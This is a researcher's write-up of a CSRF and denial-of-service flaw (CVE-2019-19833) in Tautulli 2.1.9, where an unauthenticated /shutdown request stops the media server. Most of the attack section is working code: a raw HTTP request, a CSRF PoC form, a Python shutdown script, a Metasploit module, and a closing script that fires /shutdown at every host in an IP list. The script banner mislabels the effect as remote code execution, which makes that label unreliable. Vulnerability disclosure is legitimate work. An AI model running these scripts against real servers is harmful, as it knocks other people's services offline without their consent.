Tautulli 2.1.9 version; Cross-Site Request Forgery (ShutDown) and Denial of Service (Metasploit)
While doing security research, I came across a product called Tautulli. And I started to examine the relevant application. There were two security vulnerabilities that I discovered in this product. CSRF and DDOS effects could be created. Thus, the Media server could be shut down remotely.
The main problem was anonymous access to the /shutdown parameters function. I discovered this after a long struggle.
Details :
In the corresponding version of v2.1.9 by the manufacturer of Tautulli, it has been discovered that anonymous access can be achieved in applications that do not have a user login area and that the remote media server can be shut down.
What is Tautulli?
Tautulli is a third-party application that allows you to monitor and track your Plex Media Server activity. It provides a web-based interface that lets you view statistics and information about your media library, including what has been watched, by whom, and on what device. Tautulli also offers several features to help you manage your Plex Media Server, such as viewing and deleting users, updating media metadata, and setting up notifications for specific events.
Tautulli is written in Python and can be installed on various platforms, including Windows, macOS, and Linux. It requires a Plex Media Server to be running to function and can be accessed via a web browser using the server's IP address and the port specified during installation.
In addition to its core features, Tautulli offers several optional plugins that can add additional functionality, such as updating media metadata automatically or sending notifications via Discord.
Exploit Information :
Exploit Title: Tautulli 2.1.9 — Cross-Site Request Forgery (ShutDown)
Exploit Author: Ismail Tasdelen
Vendor Homepage: https://tautulli.com/
Software : https://github.com/Tautulli/Tautulli
Product Version: v2.1.9
Platform: Windows 10 (10.0.18362)
Python Version: 2.7.11 (v2.7.11:6d1b6a68f775, Dec 5 2015, 20:40:30) [MSC v.1500 64 bit (AMD64)]
Vulernability Type : Cross-Site Request Forgery (ShutDown)
Vulenrability : Cross-Site Request Forgery
CVE : CVE-2019–19833
In Tautulli 2.1.9, CSRF in the /shutdown URI allows an attacker to shut down the remote media server. (Also, anonymous access can be achieved in applications that do not have a user login area).
CVSS Score :
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H
HTTP GET Request :
GET /shutdown HTTP/1.1 Host: XXX.XXX.XXX.XXX:8181 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Referer: http://XXX.XXX.XXX.XXX:8181/home Upgrade-Insecure-Requests: 1
CSRF PoC HTML :
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://XXX.XXX.XXX.XXX:8181/shutdown">
<input type="submit" value="Submit request" />
</form>
</body>Python Code :
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
icon = """
_____ __ _ _ _____ _ _ _ _ _ _ _ ___ __ ___
|_ _/ \| || |_ _| || | | | | | | | \ / (_ | / |/ _ \
| || /\ | \/ | | | | \/ | |_| |_| | `\ V /'/ /__`7 |\__ /
|_||_||_|\__/ |_| \__/|___|___|_| \_/ |___\/ |_\//_/
Unauthenticated Remote Code Execution
by Ismail Tasdelen
"""
print(icon)
host = input("[+] HOST: ")
port = input("[+] PORT: ")
response = requests.get("http://" + host + ":" + port + "/" + "shutdown" ) # You can also run the restart and update_check commands.
if response.status_code == 200:
print('[✓] Success!')
elif response.status_code != 200:
print('[✗] Unsuccessful!')
else:
exit()Denial of Service (Metasploit) :
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => 'Tautulli v2.1.9 - Shutdown Denial of Service',
'Description' => 'Tautulli versions 2.1.9 and prior are vulnerable to denial of service via the /shutdown URL.',
'Author' => 'Ismail Tasdelen',
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2019-19833'],
['EDB', '47785']
]
)
register_options([ Opt::RPORT(8181) ])
end
def run
res = send_request_raw({
'method' => 'GET',
'uri' => '/shutdown'
})
if res
print_status("Request sent to #{rhost}")
else
print_status("No reply from #{rhost}")
end
rescue Errno::ECONNRESET
print_status('Connection reset')
end
endNow I develop an attack code. We are developing an attack code that checks the ip or hostname list as http or https using the Python programming language and sends a request to the /shutdown parameter with the firefox user-agent as follows.
import requests
# Read the IP list from the file
with open('ip_list.txt', 'r') as f:
ip_list = f.readlines()
# Iterate over the IP list
for ip in ip_list:
ip = ip.strip() # Remove any whitespace from the end of the line
if not ip.startswith('http://') and not ip.startswith('https://'):
# The IP is not using HTTP or HTTPS, so send the request
url = f'http://{ip}:8181/shutdown'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0'}
response = requests.get(url, headers=headers)
print(response.status_code) # Print the HTTP status code of the responseReferences :
In this article, I mentioned a security issue that I discovered in the past years. Take care and see you in my next post.
